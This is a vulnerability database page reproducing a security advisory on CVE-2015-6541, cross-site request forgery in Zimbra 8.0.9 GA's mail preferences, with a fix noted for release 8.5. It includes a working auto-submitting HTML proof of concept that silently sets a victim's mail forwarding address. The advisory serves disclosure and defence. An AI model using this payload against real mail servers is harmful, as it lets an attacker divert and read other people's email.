Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDamien CauquilPACKETSTORM:135964
HistoryFeb 26, 2016 - 12:00 a.m.

Zimbra 8.0.9 GA Cross Site Request Forgery

2016-02-2600:00:00
Damien Cauquil
packetstormsecurity.com
34

0.008 Low

EPSS

Percentile

82.2%

JSON
`======================================  
Multiple CSRF in Zimbra Mail interface  
======================================  
  
  
CVE-2015-6541  
  
Description  
===========  
  
Multiple CSRF vulnerabilities have been found in the Mail interface of  
Zimbra 8.0.9 GA Release, enabling to change account  
preferences like e-mail forwarding.  
  
  
CSRF  
====  
  
Forms in the preferences part of old releases of Zimbra are vulnerable  
to CSRF because of the lack of a CSRF token identifying a valid session.  
As a consequence, requests can be forged and played arbitrarily.  
  
**Access Vector**: remote  
**Security Risk**: low  
**Vulnerability**: CWE-352  
**CVSS Base score**: 5.8  
  
----------------  
Proof of Concept  
----------------  
  
<html>  
<body>  
<form enctype="text/plain" id="trololo"  
action="https://192.168.0.171/service/soap/BatchRequest" method="POST">  
<input name='<soap:Envelope  
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context  
xmlns="urn:zimbra"><userAgent xmlns="" name="ZimbraWebClient - FF38  
(Win)" version="8.0.9_GA_6191"/><session xmlns="" id="19"/><account  
xmlns="" by="name">[email protected]</account><format xmlns=""  
type="js"/></context></soap:Header><soap:Body><BatchRequest  
xmlns="urn:zimbra" onerror="stop"><ModifyPrefsRequest  
xmlns="urn:zimbraAccount" requestId="0"><pref xmlns=""  
name="zimbraPrefMailForwardingAddress">[email protected]</pref></ModifyPrefsRequest><a  
xmlns="" n'  
value='"sn">itworks</a></BatchRequest></soap:Body></soap:Envelope>'/>  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>  
  
  
Solution  
========  
  
Sensitive forms should be protected by a CSRF token.  
  
  
Fixes  
=====  
  
Fixed with 8.5 release : bug 83547  
(https://wiki.zimbra.com/wiki/Security/Collab/86#Notes_from_8.5)  
  
  
Affected versions  
=================  
  
* Zimbra <= 8.0.9 GA Release  
  
  
Credits  
=======  
  
* Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail  
-dot- fr)  
* Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)  
  
  
--   
SYSDREAM Labs <[email protected]>  
  
GPG :  
47D1 E124 C43E F992 2A2E  
1551 8EB4 8CD9 D5B2 59A1  
  
* Website: https://sysdream.com/  
* Twitter: @sysdream  
  
`

Related

nvd 1
prion 1
zdt 1
cvelist 1
exploitpack 1
cve 1
exploitdb 1
nvd
nvd
CVE-2015-6541
2016-04-08 14:59:00
prion
prion
Cross site request forgery (csrf)
2016-04-08 14:59:00
zdt
zdt
Zimbra 8.0.9 GA - Cross-Site Request Forgery
2016-02-26 00:00:00
cvelist
cvelist
CVE-2015-6541
2016-04-08 14:00:00
exploitpack
exploitpack
Zimbra 8.0.9 GA - Cross-Site Request Forgery
2016-02-26 00:00:00
cve
cve
CVE-2015-6541
2016-04-08 14:59:00
exploitdb
exploitdb
Zimbra 8.0.9 GA - Cross-Site Request Forgery
2016-02-26 00:00:00

0.008 Low

EPSS

Percentile

82.2%

JSON
Related for PACKETSTORM:135964
nvd1prion1zdt1cvelist1exploitpack1cve1exploitdb1